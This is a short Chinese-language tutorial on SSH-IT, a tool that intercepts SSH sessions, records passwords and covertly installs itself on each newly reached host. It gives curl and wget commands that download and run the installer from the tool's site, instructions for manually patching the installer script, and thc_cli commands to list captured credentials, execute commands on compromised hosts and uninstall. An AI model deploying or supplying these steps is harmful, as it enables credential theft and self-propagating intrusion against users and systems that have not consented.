SSH-IT凭证窃取
免责声明:由于传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本篇文章作者不为此承担任何责任,一旦造成后果请自行承担!
介绍
SSH-IT可以记录登录其他主机的密码,每次用户使用 ssh 时,SSH-IT会获取SSH 连接,并(秘密)将自己安装到新连接的系统上,SSH-IT 会不断拦截、记录和传播。
工具原理
SSH-IT 会在伪造的 PTY 线束内执行原始 ssh 命令,并拦截任何用户输入和输出。它不会修改任何系统二进制文件,不需要 ptrace(),权限不需要指定 root 或超级用户权限。
安装
访问官网SSH-IT 执行官方下载&运行命令
bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
or:
bash -c "$(wget --no-verbose -O- https://thc.org/ssh-it/x)"
若在下载过程中下载SSH-IT程序失败时,可以手动下载并修改x代码进行安装运行
https://github.com/hackerschoice/binary/blob/main/ssh-it/ssh-it-pkg.tar.gz
下载完成后修改x代码(注释掉下载,修改解压文件路径)
init_vars
#echo -en 2>&1 "Downloading binaries.................................................."
#dl "${PKG_TGZ}" "${THC_TMPDIR}/${PKG_TGZ}"
OK_OUT
echo -en 2>&1 "Unpacking binaries...................................................."
# Unpack (suppress "tar: warning: skipping header 'x'" on alpine linux
(tar xfz "${PKG_TGZ}" 2>/dev/null) || { FAIL_OUT "unpacking failed"; errexit; }
[[ ! -f "${PKG_NAME}/hook.sh" ]] && { FAIL_OUT "unpacking failed"; errexit; }
OK_OUT
然后重新执行x程序即可
使用
上面安装成功后默认运行,假设上面是主机A,主机A登录主机B,在主机A上查看日志记录(注:如果AB之间免密登录那么通过此命令在主机A上将无法记录密码,提示auth key)
~/.config/prng/thc_cli -r list
查看主机B发现已经存在SSH-IT程序
执行命令
~/.config/prng/thc_cli -r exec 'id'
清除程序命令
~/.config/prng/thc_cli -r uninstall
